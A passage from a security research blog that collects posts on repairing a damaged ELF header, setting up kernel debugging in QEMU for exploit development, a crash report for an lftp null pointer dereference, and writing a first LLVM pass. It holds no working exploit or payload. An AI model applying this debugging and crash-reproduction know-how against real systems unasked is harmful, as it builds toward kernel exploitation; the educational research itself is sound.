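def guess_e_shoff(shstrtab_offset: int, shstrtab_size: int, align: int = 8) -> int:
    """Round the first byte after .shstrtab up to the next `align` boundary."""
    end = shstrtab_offset + shstrtab_size
    return (end + align - 1) // align * align


# Made-up offset and size, used only to exercise the rounding.
print(hex(guess_e_shoff(0x1001, 0x10)))
```

If the guess is wrong, the hex dump around that offset is still the right place to start eyeballing for the patterns described above.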

So let's try using these tricks on a real binary, and work it from being an undebuggable defiled corpse to a living, breathing binary totally under our control.

ELF Necromancy in Practice

As mentioned before the binary doesn't respond well to gdb, when trying to open it in gdb we get this annoying message:

>$ gdb ./dead.elf

...

Type "apropos word" to search for commands related to "word"...
"/home/kh3m/Research/CTF/elf_necromancy/misc/./dead.elf": not in executable format: file truncated

Checking this out with readelf:

Looks like the program headers might be just fine (I checked, they are), which means our binary should still be able to execute; but there's obviously something wrong with the e_shnum and e_shoff fields in the ELF header.

We already have some freebies, namely the location of the .shstrtab and the number of sections (24). So we can patch this up and see if it gives us any more positive feedback. Here's the header before the patch:

And here's after:

Okay so that worked out nicely. We have a couple more things to achieve, so on to the next phase: finding e_shoff, the beginning of the section header table. Given that this is probably compiled with GCC, we can expect the actual e_shoff offset to be near the end of the .shstrtab. Here's what that section looks like:

Looking at some of the dead giveaways for a section header table, especially the f6 ff ff 6f byte pattern from earlier, we can be pretty confident we just found ours! Looking at the dump I'm going to make the guess that 0x3168 is where it starts; if we patch this in, readelf does the following:

And bingo, we have something that can be parsed as a section header table, but there are still some problems, it looks like someone messed with the link fields. We're going to need to fill them out. And I think that will make a great follow up post!
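For anyone who would rather script the two header patches than poke at a hex editor, here is a rough sketch. It assumes a little-endian ELF64 file, where e_shoff lives at offset 0x28 (8 bytes) and e_shnum at offset 0x3C (2 bytes) of the ELF header; patch_section_fields is a hypothetical helper name, not something from the tooling used in this post.

```python
import struct

E_SHOFF = 0x28  # Elf64_Ehdr.e_shoff, 8 bytes
E_SHNUM = 0x3C  # Elf64_Ehdr.e_shnum, 2 bytes


def patch_section_fields(header: bytearray, e_shoff: int, e_shnum: int) -> None:
    """Overwrite e_shoff and e_shnum in place in a little-endian ELF64 header."""
    if header[:4] != b"\x7fELF" or header[4] != 2 or header[5] != 1:
        raise ValueError("expected a little-endian ELF64 header")
    struct.pack_into("<Q", header, E_SHOFF, e_shoff)
    struct.pack_into("<H", header, E_SHNUM, e_shnum)
```

In practice you would read the whole file into a bytearray, call this with your guesses (0x3168 and 24 in the walkthrough above), write the result to a new file and rerun readelf on the copy.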

[Linux Kernel Exploitation 0x0] Debugging the Kernel with QEMU

2020-11-10T21:10:00.006-08:00

Hi folks, in this post I'm going to walk through how to set up the Linux kernel for debugging. I will also demonstrate that the setup works by setting a breakpoint on a test driver I wrote myself. All the code will be available from my gitlab, and all the links to my gitlab will be re-posted at the end.

The setup I describe here re-uses some parts of the syzkaller setup, and for good reason: later on in the post series I will break into a tutorial for the syzkaller tool as well. So let's get on with it.

Screenshot of a successful debug session with full debug symbols for the kernel! We can even see the call to start_kernel and a frame before that as well!

The Process

Okay so we want to study kernel exploitation, but given that the kernel isn't something totally accessible from userspace, it's not as convenient to debug as userspace stuff. We need a bit of a run-up before we can actually poke and prod the kernel to figure out how to write our exploits. There are a number of important steps to getting this done; here's what we're going to do:

Build a kernel
Build an image
Launch the virtual machine
Attach and setup the debugger
Building, loading and debugging a test module

We also need to be able to build our kernel because there may be build options that are important to configure in order to control exploit protection or include modules and functionality to the kernel when needed.

Building a Kernel

Okay so before we get going with launching our Qemu instances and debugging modules we need an environment. For convenience sake I'm working off of a fresh Ubuntu 18.04.5 LTS machine. I'll document the processes from fresh install to first successful kernel build.

To start we need to make sure we have everything we need to build a kernel:

$sudo apt-get update

$sudo apt-get upgrade

$sudo apt-get install git fakeroot build-essential ncurses-dev xz-utils libssl-dev bc flex libelf-dev bison qemu-system-x86

Next we obviously need a kernel so lets download a brand new kernel:

$wget https://cdn.kernel.org/pub/linux/kernel/v5.x/linux-5.9.7.tar.xz
--2020-11-10 23:00:26-- https://cdn.kernel.org/pub/linux/kernel/v5.x/linux-5.9.7.tar.xz
Resolving cdn.kernel.org (cdn.kernel.org)... 151.101.225.176, 2a04:4e42:35::432
Connecting to cdn.kernel.org (cdn.kernel.org)|151.101.225.176|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 115538096 (110M) [application/x-xz]
Saving to: ‘linux-5.9.7.tar.xz’

linux-5.9.7.tar.xz 42%[=============> ] 46.79M 3.08MB/s eta 23s

...

$tar -xf linux-5.9.7.tar.xz

We're just a couple steps from sending the final build commands, before we get to that lets make sure the kernel config is ready to rock. Because we're working on a Linux host we can simply swipe the .config for the virtual machine's Ubuntu kernel like so:

$cp /boot/config-5.4.0-52-generic .config

We then need to select some options that make debugging and exploit dev a little easier. First thing we need is to merge some options for making the kernel easier to run in a virtual machine:

$make kvmconfig

Using .config as base
Merging ./kernel/configs/kvm_guest.config
#
# merged configuration written to .config (needs make)
#

...

Great, now we need to enable some options for debug symbols, turn off KASLR and set up other awesome things. So open the .config in a text editor and make sure you either add or modify lines so these options are set:

CONFIG_KCOV=y
CONFIG_DEBUG_INFO=y
CONFIG_KASAN=y
CONFIG_KASAN_INLINE=y
CONFIG_CONFIGFS_FS=y
CONFIG_SECURITYFS=y
# CONFIG_RANDOMIZE_BASE is not set
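If you'd rather not hand-edit the file, the same change can be scripted. This is only a sketch that rewrites .config text line by line; apply_options and WANTED are names I made up, and it does not resolve Kconfig dependencies for you.

```python
# Options from the list above; None means "write it as '# ... is not set'".
WANTED = {
    "CONFIG_KCOV": "y",
    "CONFIG_DEBUG_INFO": "y",
    "CONFIG_KASAN": "y",
    "CONFIG_KASAN_INLINE": "y",
    "CONFIG_CONFIGFS_FS": "y",
    "CONFIG_SECURITYFS": "y",
    "CONFIG_RANDOMIZE_BASE": None,
}


def render(name, value):
    return f"# {name} is not set" if value is None else f"{name}={value}"


def apply_options(config_text: str, wanted: dict) -> str:
    """Replace existing lines for the wanted options, append the missing ones."""
    remaining = dict(wanted)
    out = []
    for line in config_text.splitlines():
        name = None
        if line.startswith("CONFIG_") and "=" in line:
            name = line.split("=", 1)[0]
        elif line.startswith("# CONFIG_") and line.endswith(" is not set"):
            name = line[2:-len(" is not set")]
        if name in remaining:
            out.append(render(name, remaining.pop(name)))
        else:
            out.append(line)
    out.extend(render(n, v) for n, v in remaining.items())
    return "\n".join(out) + "\n"
```

Reading .config, passing its text through apply_options(text, WANTED) and writing it back gives you the same file you would have produced in the editor.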

Cool now we need to make sure the config is ready to go for a build:

$make savedefconfig

$make -j4

...

Now you should grab some coffee or play a StarCraft 2 game, because this may take a while. Okay so if your build worked you should have a kernel image in the following location:

[kernel_dir]/arch/x86_64/boot/bzImage

Build an image

We're going to build an image for this kernel, so we might as well plop an "image" directory in this folder:

$mkdir [kernel_dir]/image/

Once your kernel is built we need to start thinking about how to build a file system for it. Here I'm going to cheat and steal some tips from the syzkaller folks. We first need to download syzkaller, as follows:

$git clone https://github.com/google/syzkaller.git

Cloning into 'syzkaller'...
remote: Enumerating objects: 1, done.
remote: Counting objects: 100% (1/1), done.
...

Move back to the kernel build and setup an image:

$cd [kernel_dir]/image/

$cp [syzkaller_dir]/tools/create-image.sh .

Okay so we can now create an image; all we need to do is invoke create-image.sh:

$./create-image.sh

+ DIR=chroot
+ PREINSTALL_PKGS=openssh-server,curl,tar,gcc,libc6-dev,time,strace,sudo,less,psmisc,selinux-utils,policycoreutils,checkpolicy,selinux-policy-default,firmware-atheros,python,xrdp,g++,make,libtool,autoconf,nasm
+ '[' -z ']'
+ ADD_PACKAGE=make,sysbench,git,vim,tmux,usbutils,tcpdump

...

If that worked you should have the following in your folder:

$ls

chroot/

create-image.sh

stretch.id_rsa

stretch.id_rsa.pub

stretch.img

Launch the virtual machine

Now we can launch qemu with all the goodies in place:

qemu-system-x86_64 \
-kernel ../arch/x86_64/boot/bzImage \
-append "console=ttyS0 root=/dev/sda earlyprintk=serial nokaslr"\
-hda ./stretch.img \
-net user,hostfwd=tcp::10021-:22 -net nic \
-enable-kvm \
-nographic \
-m 2G \
-s \
-S \
-smp 2 \
-pidfile vm.pid \
2>&1 | tee vm.log

...

The -s is a shorthand for -gdb tcp::1234, which means the gdbserver will be hosted at port 1234. -S tells qemu not to start the cpu automatically, this gives us a chance to set a breakpoint before the kernel starts executing.

So that's the image running smoothly, lets setup our debugging environment.

Attach and setup the debugger

We can then attach a gdb debugger to the qemu instance as follows. On another terminal, separate from the one running your qemu instance, start up gdb and issue the following commands:

$cd [kernel_dir]/image/

$gdb ../vmlinux

Reading symbols from ../vmlinux...

(gdb) target remote :1234

Remote debugging using :1234
0x000000000000fff0 in exception_stacks ()

(gdb) c

We give the "c" command to continue execution. We can now set some of our own breakpoints. As part of the tutorial I've included a custom IOCTL driver and app code (code that invokes the ioctl from userspace); I thought this would be nifty since it shows the full ability to develop and debug a driver, something crucial to hunting down modern bugs and exploit development. Anyway, let's code and build our own module.

Building, Loading and debugging a test module

Okay so we need to make a test ioctl driver, so let's head over to the kernel source directory and make a new folder in the drivers/ subfolder:

$cd [kernel_dir]/drivers/

$mkdir debug_driver/

$cd debug_driver/

$touch debug_driver.c

$touch debug_driver_app.c

$touch Makefile

The code for debug_driver.c and debug_driver_app.c as well as the Makefile are available at this repo https://gitlab.com/k3170makan/linux-kernel-exploit-development. All you need to do is download the repo and stick this in its own folder under [kernel_dir]/drivers/. To build the module we need to set the "M" variable in the kernel make script:

$cd [kernel_dir]; make -C . M=drivers/debug_driver/

make: Entering directory '/home/kh3m/Research/Kernel/debug_image/linux-5.5.3'
AR drivers/debug_driver//built-in.a
CC [M] drivers/debug_driver//debug_driver.o

...

Now we need to get this module onto our QEMU guest somehow. I do this the hard way: I'm sure there are all sorts of nifty ways to scp files onto the guest, but I actually just re-create the image after copying the drivers to a folder that gets baked into the start-up filesystem. First we need to edit create-image.sh so it includes everything in a folder we specify; that way we can just dump stuff in the folder and run create-image.sh whenever we want those files on a live instance.

So before create-image.sh builds the disk image on line 129, stick this in there:

++ sudo cp -r ./add/* $DIR/home/.

Now we make an "add" folder and stick the kernel module and app code in there:

$ cd [kernel_dir]/image/

$ mkdir add/

$ cd add/

$ cp ../../drivers/debug_driver/debug_driver.ko .

$ cp ../../drivers/debug_driver/debug_driver_app.c .

$ cd ..

$ ./create-image.sh

Okay so we have a module, we have a symbol file debug_driver.ko, with stuff we need to set breakpoints. Lets load the module into the kernel, then check where it gets loaded before we actually set the breakpoint:

root@syzkaller:$ cd /home/

root@syzkaller:$ insmod debug_driver.ko

[   32.792570] audit: type=1400 audit(1605058227.605:7): avc: denied { module_load } for pid=249 comm="insmod" path="/home/debug_driver.ko" dev="sda" ino=21253 scontext=system_u:system_r:kernel_t:s0 1
[   32.793766] debug_driver: loading out-of-tree module taints kernel.
[   32.800394] [debug_driver] loaded!
[   32.800826] [debug_driver] device registered successfully
[   32.802298] [debug_driver] device has been successfully created

Before we can debug it properly we need to know where it is loaded in kernel memory:

root@syzkaller:/home# cat /proc/modules
debug_driver 16384 0 - Live 0xffffffffa0000000 (O)
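Copying the base address by hand gets old quickly, so here is a small sketch that pulls it out of /proc/modules text and builds the gdb command for you. The helper names module_base and gdb_command are hypothetical, and the parsing simply assumes the column layout visible in the output above (name, size, refcount, dependencies, state, address).

```python
def module_base(proc_modules_text: str, name: str) -> int:
    """Return the load address of `name` from /proc/modules-style text."""
    for line in proc_modules_text.splitlines():
        fields = line.split()
        # name size refcount deps state address [taint flags]
        if len(fields) >= 6 and fields[0] == name:
            return int(fields[5], 16)
    raise KeyError(name)


def gdb_command(ko_path: str, base: int) -> str:
    """Build the add-symbol-file line to paste into gdb."""
    return f"add-symbol-file {ko_path} {base:#x}"
```

Inside the guest you would feed it the contents of /proc/modules (read as root, otherwise the address column may be zeroed) and paste the resulting line into the gdb session on the host.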

Okay lets now set our breakpoint and load the symbol file using the base address of the module:

(gdb) add-symbol-file ../drivers/debug_driver/debug_driver.ko 0xffffffffa0000000
add symbol table from file "../drivers/debug_driver/debug_driver.ko" at
.text_addr = 0xffffffffa0000000
(y or n) y
Reading symbols from ../drivers/debug_driver/debug_driver.ko...
(gdb) break dev_read
Breakpoint 1 at 0xffffffffa0000010: file drivers/debug_driver//debug_driver.c, line 81.
(gdb) c

Cool lets execute the driver program so we can trigger the code we want:

root@syzkaller:$ gcc -o debug_driver_app.elf debug_driver_app.c

root@syzkaller:/home# ./debug_driver_app.elf
Usage: ./debug_driver_app.elf [message to write] [read length]

root@syzkaller:$ ./debug_driver_app.elf "hello" 10

[ 160.083320] [debug_driver] message successfully copied message => [hello]
[ 160.083326] [debug_driver] buffer copied to message holder
[debug_driver] r[ 160.086175] [debug_driver] device released

This should trigger the dev_read function; and as we can see in the attached debugger:

Thread 2 hit Breakpoint 1, dev_read (filep=0xffff888067c29dc0, buffer=0xffff888067c29dc0 "",
len=16, offset=0xffffc900002c7eb8) at drivers/debug_driver//debug_driver.c:81
81 error_count = copy_to_user(buffer,message,len); //copy out of message into buffer

So that's the breakpoint hit! We achieved our goal for this post. If you'd like to explore more, try setting more breakpoints, and before moving on to the next post make sure to get your gdb-fu up. The next post is going to look at exploitation of stack vulnerabilities.

References and Reading

[Memory Corruption Bugs] Lftp Null pointer dereference (<= 4.9.1) in CmdExec::FeedCmd

2020-06-20T23:53:00.000-07:00

Date: 06-21-20
Vendor Homepage: https://lftp.yar.ru/
Software Link: http://lftp.yar.ru/ftp/lftp-4.9.1.tar.gz
Version: <= 4.9.1
Bug link: https://github.com/lavv17/lftp/issues/593

I've discovered a null pointer dereference bug in LFTP version 4.9.1 which probably affects previous versions. The bug occurs in CmdExec::FeedCmd and triggers in strlen due to a null pointer argument. The following gdb trace demonstrates this:

(gdb) r -f lftp_cmdfile_fuzz/crashes/id:000000,sig:11,src:000000,op:havoc,rep:4
The program being debugged has been started already.
...
Breakpoint 5, 0x0000000000461b61 in CmdExec::FeedCmd(char const*) ()
(gdb) x/5ig $rip
=> 0x461b61 <_ZN7CmdExec7FeedCmdEPKc+97>:    callq 0x43a3a0 <strlen@plt>
   0x461b66 <_ZN7CmdExec7FeedCmdEPKc+102>:    mov    %rbx,%rdi
   0x461b69 <_ZN7CmdExec7FeedCmdEPKc+105>:    mov    %r14,%rsi
   0x461b6c <_ZN7CmdExec7FeedCmdEPKc+108>:    mov    %eax,%edx
   0x461b6e <_ZN7CmdExec7FeedCmdEPKc+110>:    add    $0x8,%rsp

(gdb) x/1xg $rsi
0x0: Cannot access memory at address 0x0 <--- argument passed to strlen is a null pointer
(gdb) ni

Program received signal SIGSEGV, Segmentation fault.
__strlen_avx2 () at ../sysdeps/x86_64/multiarch/strlen-avx2.S:65
65 ../sysdeps/x86_64/multiarch/strlen-avx2.S: No such file or directory.
(gdb) i s
#0 __strlen_avx2 () at ../sysdeps/x86_64/multiarch/strlen-avx2.S:65
#1 0x0000000000461b66 in CmdExec::FeedCmd(char const*) ()
#2 0x00000000004726f7 in cmd_subsh(CmdExec*) ()
#3 0x0000000000462fa1 in CmdExec::exec_parsed_command() ()
#4 0x0000000000468d60 in CmdExec::Do() ()
#5 0x0000000000563a76 in SMTask::ScheduleThis() ()
#6 0x000000000056325d in SMTask::Schedule() ()
#7 0x00000000004604ce in Job::WaitDone() ()
#8 0x000000000043edfd in main ()

Testing this on the latest binaries from the Ubuntu repository

>$ lftp -v
LFTP | Version 4.8.4 | Copyright (c) 1996-2017 Alexander V. Lukyanov

LFTP is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
...
>$ lftp -f ../lftp_cmdfile_fuzz/crashes/id\:000000\,sig\:11\,src\:000000\,op\:havoc\,rep\:4
Segmentation fault

Some closing remarks: I've reported the bug to the Debian folks so they are aware. It didn't meet the bar for a vulnerability, but I think this may constitute a problem on some platforms and speaks to bigger problems in the lftp code base. I don't know of any public ways to exploit this, but I'm posting it so there is a public record and awareness.

[Learning LLVM I ] Introduction to the LLVM Pass Framework

2020-04-06T04:36:00.000-07:00

Hi folks, it's been a while! In this post I'm going to talk about getting started with LLVM and I'll discuss writing a basic pass which we will build on as the post series develops.

Why LLVM?

LLVM is becoming really popular, with a sprawling community behind it and a string of research projects contributing plugins and passes there's ever more reason to get involved and hack out some passes of your own.

We should start with what is LLVM? LLVM formerly standing for "Low Level Virtual Machine" (I hear the acronym no longer means this) now refers to a collection of tools that comprise a whole compiler architecture and tool chain. There are components that debug, instrument code, link libraries and much much more. In this post we will be focusing on llvm as it pertains to the set of libraries for interacting with the compiler internals called the LLVM Pass Framework.

An important thing to know about LLVM before we move on is its modular design. The actual compiler is comprised of 3 separate components, namely the:

Front-end - Handles lexing and compiling code into LLVM's intermediate representation (more on this in future posts). IR is a powerful tool in compilers, especially here, because it means whatever strange language you generated the IR from doesn't really matter to the phases going forward. LLVM can be re-targeted for pretty much whatever you can contrive into bitcode or IR.
Optimizer - The optimizer performs, uhm, well, optimization on the IR passed to it. There are a ton of different optimizations (I believe some papers speak of something like 100 different loop optimizations for instance). The optimizer strips out as many redundant look ups or dead variable assignments as possible, all backed by the static single assignment (SSA) form (each register is only assigned a value once). This SSA form allows the compiler to isolate important properties and anomalies in the language that would otherwise be quite ambiguous and tedious to code around.
Back-end - This part of the compiler emits the actual machine dependent assembler code. If you want to participate in the machine dependent code generator then writing a MachineFunctionPass is for you, since it kicks in every time a function is rendered in machine dependent code (I discuss the pass types further on in the post). Useful reasons to do this might be to check for differentials in the IR vs machine code, maybe to nuke certain instructions like cache flushing in case code is trying some side-channel attacks, maybe inject functions that force it to run with a conditioned cache to defend against attacks or instrument specific asm side effects at machine level, and I'm sure tons more awesome stuff.
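Since SSA gets mentioned in passing in the optimizer description above, here is a toy sketch of the "each register is only assigned once" idea. It only handles straight-line code (no branches, so no phi nodes) and uses a made-up statement format of (target, tokens); it is an illustration of the concept, not how LLVM builds its IR.

```python
def to_ssa(statements):
    """Rename variables so every assignment gets a fresh, numbered name.

    statements: list of (target, tokens) pairs for straight-line code, e.g.
    ("x", ["a", "+", "b"]) for x = a + b.
    """
    version = {}  # variable name -> latest version number
    out = []
    for target, tokens in statements:
        # Uses refer to the latest version; inputs never assigned stay as-is.
        renamed = [f"{t}_{version[t]}" if t in version else t for t in tokens]
        version[target] = version.get(target, 0) + 1
        out.append((f"{target}_{version[target]}", renamed))
    return out


program = [
    ("x", ["a", "+", "b"]),
    ("x", ["x", "*", "2"]),
    ("y", ["x", "+", "1"]),
]
for target, tokens in to_ssa(program):
    print(target, "=", " ".join(tokens))
```

After renaming, the second assignment to x no longer overwrites anything, which is what makes it easy for an optimizer to ask "is this particular value ever used?".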

We can see from the diagram above that IR floats between the different stages, meaning passes actually operate on LLVM IR. This means you can't run into this assuming that you can filter for stack base register behavior or instruction pointer weirdness. You'll have to get to grips with LLVM IR if you mean to do anything useful with the framework; it's the lingua franca of the compiler so learn it good.

This video is an excellent introduction to the LLVM IR concepts, please check it out if you're looking for a well structured and well delivered introduction https://www.youtube.com/watch?v=m8G_S5LwlTo .

Here come the compiler bugs

A motivating factor for security folk like me is the advent of nifty security bugs in code that stem from compiler optimizations. One really good example is a bug termed "memsad". The key issue here is applying aggressive optimizations to certain contexts of the memset call (Ilja van Sprundel from IOActive originally showed me this bug, defo check out what he has to say [https://media.ccc.de/v/35c3-9788-memsad]).

What we learned here is that optimizations can actually remove memset calls that could be used to clear cryptographic materials from memory. The memset optimization can culminate in almost heart-bleed like conditions, directly compromising cryptographic operations if they go unchecked for too long or appear in too many contexts.

To clarify what I'm talking about here's a potential example of memsad in something called RIOT-OS:

Extract from https://github.com/RIOT-OS/RIOT/issues/10751

In the code above you can see the code call memset (on line 14) with a buffer as an argument, and then not use the buffer after that point, just before returning. What this means in short is that GCC (and some other compilers) will treat the buffer as dead after line 14 and remove the memset during optimization (dead store elimination), correctly assuming that it has no impact on the outcome of the function. The result is that in the code actually being run, the memset will not be called.

Of course if that buffer happens to hold a hash of something sensitive or a private key, this means that when the function returns these values will still be available in memory, potentially leaked out to disk during swaps or divulged during any number of kernel memory disclosure vulnerabilities. Either way, if you are serious about controlling access to your crypto, this bug can be a big problem because it means you no longer have a solid grasp of where exactly in your org cryptographic materials are accessible.

Anyway the point I'm trying to make here is that the internals of a compiler matter in a security sense. The existence of this bug immediately means other examples exist, at the least as more contrived examples of this one. And in order to get a view of where these bugs come from, that obviously means either trudging through unfriendly compiler code or hooking into a framework specifically designed to give you purchase on the internals of the compiler. LLVM is trying to be this framework.

In order to invoke some of the magic of LLVM one can write "passes" using the nifty API LLVM forwards. The next section discusses some background on these passes and gets you going with your first one.

Your first Pass

To start, I should say that compilers don't do everything in a single run at your code (well at least LLVM doesn't); most compilers resort to a simple strategy of doing things in separate "passes" over the code. This effectively means that it will pass over the code once to achieve a certain goal, and then when a desired property emerges from the code (like provably correct syntax, efficient array look ups, etc) it will be hit with more passes until it is rendered into compiled machine code (or LLVM bit code if that's your target).

LLVM gives you access to these passes via something called the LLVM Pass Framework (documentation linked below). The way this works is you write a subclass of the llvm::Pass class with methods that get called during each of the instantiated pass types and you get to tell it what to do with the code! Pretty cool right? You are literally writing a compiler here, and if that doesn't get you laid then I dunno what will.

Anyway here's a list of some of the passes LLVM has APIs for:

Module Pass - When you write a module pass your methods will trigger in a context that gives you a view of the entire source file (a .c/.cpp file) being processed as a single unit. What's neat about the Module Pass is that you can trigger analysis on functions from the Module Pass. I know this sounds redundant, but imagine trying to process function semantics and, say, needing context of the global variables, or seeking to optimize FunctionPass specific stuff by triggering some analysis from the view of the entire file first, i.e. setting up your shadow memory manager, collecting metrics on the module etc.
Function Pass - The function pass, as the name indicates, triggers on functions as stand alone units. This is obviously very useful since functions are where the action happens! There are some caveats to using these though: because of the out of order mode of processing, you shouldn't expect to hit each function in your pass in a given order or make any analysis depend on it. More important caveats are mentioned on the LLVM site (check out "Writing an LLVM Pass" in the reference section).
Loop Pass - Loop Passes run on, you guessed it, loop definitions in context. It actually processes nested loops starting from the innermost outward, meaning the last loop processed in a collection of nested loops will be the outer-most one, i.e. loop A{ loop B { loop C} } will be processed C->B->A. These passes are great for performing quick optimizations on loops; for instance if you're looking for any code that may have interesting cache behaviour, you can whip up a loop pass and model what the cache would look like during the loop. Other more obvious applications could be things like simplifying array operations, or removing statements that don't affect computation or slow down loop speed.
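The C->B->A ordering described for loop passes is just a post-order walk over the loop nest. Here is a tiny sketch that models only that ordering; the (name, children) tuple format and the innermost_first name are made up for illustration and have nothing to do with LLVM's actual loop data structures.

```python
def innermost_first(loop):
    """Return loop names in the order a loop pass would visit them.

    loop: (name, [child loops]); children are visited before their parent.
    """
    name, children = loop
    order = []
    for child in children:
        order.extend(innermost_first(child))
    order.append(name)
    return order


# loop A { loop B { loop C } }
nest = ("A", [("B", [("C", [])])])
print(innermost_first(nest))  # ['C', 'B', 'A']
```

The practical upshot is that by the time your pass sees an outer loop, every loop nested inside it has already been handled.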

There are a few other very powerful pass types I'm not mentioning here for the sake of brevity, namely the RegionPass, CallGraphSCCPass and the MachineFunctionPass. If you need the deets on these I suggest checking out the LLVM documentation in the reference section.

The general pattern to employing LLVM to do stuff is having one part of your code collect data and another analyze data. For instance, let's say you're looking for use-after-frees: you could have one part of your code tag and log all the calls to free() and another collecting these contexts to see if there are any funky things going on. The point I'm making here is there is usually a collection phase and an analysis phase, loosely speaking. For us these will be a bit compressed in our first example pass, because we're just going to spit out all the function calls and make LLVM tell us the name of the function being called.
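To show the collect-then-analyze split without any LLVM machinery, here is a toy sketch over a made-up event trace of ("free", name) and ("use", name) pairs. The trace format and the function names are assumptions for illustration only; a real pass would gather these events from IR instructions instead.

```python
def collect(trace):
    """Collection phase: log where each pointer is first freed and every use."""
    frees, uses = {}, []
    for index, (op, ptr) in enumerate(trace):
        if op == "free":
            frees.setdefault(ptr, index)
        elif op == "use":
            uses.append((index, ptr))
    return frees, uses


def analyze(frees, uses):
    """Analysis phase: report uses that happen after the pointer was freed."""
    return [(index, ptr) for index, ptr in uses if ptr in frees and index > frees[ptr]]


trace = [("use", "buf"), ("free", "buf"), ("use", "buf"), ("use", "key")]
print(analyze(*collect(trace)))  # [(2, 'buf')]
```

Keeping the two phases separate means you can swap in a smarter analysis later without touching the code that gathers the events.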

The Code

Here's the code for our first LLVM pass, don't fret I'll explain whats going on right after the code snippet:

Lines 1-6 are pretty straight forward they just make sure all the relevant namespaces and function definitions are accounted for, more important to discuss is the code on line 9:

9 struct FunctionNamePass : public FunctionPass {

Here we are declaring what kind of pass we want and what our instance should be called, namely we're writing a pass of type llvm::FunctionPass called "FunctionNamePass". If you'd like to check out the documentation for the FunctionPass class its available here ().

Moving on, we then give it an ID member field so the LLVM Pass framework can uniquely identify it. Then finally in lines 13-16 we implement llvm::FunctionPass::runOnFunction(Function &), which is the star of the show as far as getting stuff done goes. This function is where you put all the analysis you want to do: pull out function calls, check arguments etc etc. The argument passed in here is a reference to a Function, which is the current function being analysed. In line 14 we can see the code do the following:

14 errs() << "[*] function '" << F.getName() << "'\n";

Which is a contrived way of printing to stderr (via the errs() call), and getting the function name with the nifty Function::getName() method.

We now have a defined runOnFunction method and we can move onto registering our pass so that clang can pick it up. We're doing this so that we can use the clang -Xclang -load -Xclang command (more detail on this in the next section) to invoke our pass, though there is an alternative way discussed near the end of the post. Doing things this way makes the story a little shorter and easier to understand. So how do we get clang to see and invoke our pass automatically? We make use of LLVM's Pass registration.

Here's the code that registers our Pass (lines 24-30):

24 static void registerFunctionNamePass(const PassManagerBuilder&, legacy::PassManagerBase &PM) {

PM.add(new FunctionNamePass());

}

28 static RegisterStandardPasses
RegisterMyPass(PassManagerBuilder::EP_EarlyAsPossible,
registerFunctionNamePass);

Above we can see registerFunctionNamePass, which is a callback we are defining that will register our pass for us. You can name this anything of course; the important thing is that it hands an instance of our pass to the legacy::PassManagerBase::add() function. Next we need to pass our registration callback to the actual pass registration system; this is done by making an instance of RegisterStandardPasses in line 28.

Okay so that pretty much makes up all the important aspects of the pass. We can move on to compiling and running it, which is discussed in the next section.

Compiling and Running

Okay so our pass is all scripted up we need to be able to build and run it. To get that done we're gonna need to setup a folder structure and some CMakeLists.txt's. To skip all the headache involved in this I suggest checking out a repo that has all of this already pre-cooked, I relied on this repo by Adrian Sampson https://github.com/sampsyo/llvm-pass-skeleton.

The top level CMakeLists.txt expects a folder named FunctionName next to it (holding FunctionName.cpp, which is what we are renaming Skeleton.cpp to), like so:

llvm-pass-skeleton
├── CMakeLists.txt
├── FunctionName
│ ├── CMakeLists.txt
│ └── FunctionName.cpp

Where the top level llvm-pass-skeleton/CMakeLists.txt looks as follows:

And the sub-level one under FunctionName/CMakeLists.txt looks like this:

Once your folders are set up good, you can make your build folder and pump out some cmake and make action:

cd llvm-pass-skeleton
mkdir build
cd build
cmake ..
make

If everything goes well you should see the following output:

>$ cmake ..
-- The C compiler identification is GNU 9.2.1
-- The CXX compiler identification is GNU 9.2.1
-- Check for working C compiler: /usr/bin/cc
-- Check for working C compiler: /usr/bin/cc -- works
-- Detecting C compiler ABI info
-- Detecting C compiler ABI info - done
-- Detecting C compile features
-- Detecting C compile features - done
-- Check for working CXX compiler: /usr/bin/c++
-- Check for working CXX compiler: /usr/bin/c++ -- works
-- Detecting CXX compiler ABI info
-- Detecting CXX compiler ABI info - done
-- Detecting CXX compile features
-- Detecting CXX compile features - done
-- Configuring done
-- Generating done
-- Build files have been written to: /home/kh3m/Research/llvm/tutorials/llvm-passes/build

>$ make
Scanning dependencies of target FunctionNamePass
[ 50%] Building CXX object FunctionName/CMakeFiles/FunctionNamePass.dir/FunctionName.cpp.o
[100%] Linking CXX shared module libFunctionNamePass.so
[100%] Built target FunctionNamePass

We can then run it by invoking the following command:

>$ clang -Xclang -load -Xclang FunctionName/libFunctionNamePass.so ../radamsa.c
[*] function 'main'
[*] function 'find_heap'
[*] function 'setup'
[*] function 'load_heap'
[*] function 'vm'
[*] function 'onum'
[*] function 'read_heap'
[*] function 'heap_metrics'
[*] function 'get_obj_metrics'
[*] function 'get_nat'
[*] function 'set_signal_handler'
[*] function 'signal_handler'
[*] function 'decode_fasl'
[*] function 'get_obj'
[*] function 'get_field'
[*] function 'mkraw'
[*] function 'gc'
[*] function 'mkpair'
...

You may not have a radamsa.c in your folder, any C code should suffice I just like using radamsa because its standalone, doesn't have any complex dependencies and comes packed with all kinds of crazy code to test on.

Alternatively you can invoke your pass by using opt which is the way the LLVM documentation does it, more on that method here: https://llvm.org/docs/WritingAnLLVMPass.html#running-a-pass-with-opt

Okay I think this is a good place to end this post. We will carry on adding stuff to our Pass as the series goes on, so stay tuned!

References and Further Reading

LLVM For Grad Students - https://www.cs.cornell.edu/~asampson/blog/llvm.html
Static Single Assignment (wikipedia) - https://en.wikipedia.org/wiki/Static_single_assignment_form
llvm::Pass Class Reference abstract - https://llvm.org/doxygen/classllvm_1_1Pass.html
RIOT-OS https://github.com/RIOT-OS/RIOT/blob/master/sys/crypto/helper.c#L38-L44
Memsad why clearing memory is hard. (CCC, 2018) - https://media.ccc.de/v/35c3-9788-memsad
LLVM: A Compilation Framework for Lifelong Program Analysis & Transformation (2004) - https://llvm.org/pubs/2004-01-30-CGO-LLVM.pdf
The most dangerous function in the C/C++ world (2015) - https://www.viva64.com/en/b/0360/
2019 EuroLLVM Developers’ Meeting: V. Bridgers & F. Piovezan “LLVM IR Tutorial - Phis, GEPs ...” - https://www.youtube.com/watch?v=m8G_S5LwlTo
Loop Optimization Framework - https://arxiv.org/pdf/1811.00632.pdf
LLVM Skeleton Pass (Adrian Sampson) - https://github.com/sampsyo/llvm-pass-skeleton

[Symbolic Execution 0x1] Modeling registers and setting constraints

2019-12-31T10:37:00.000-08:00

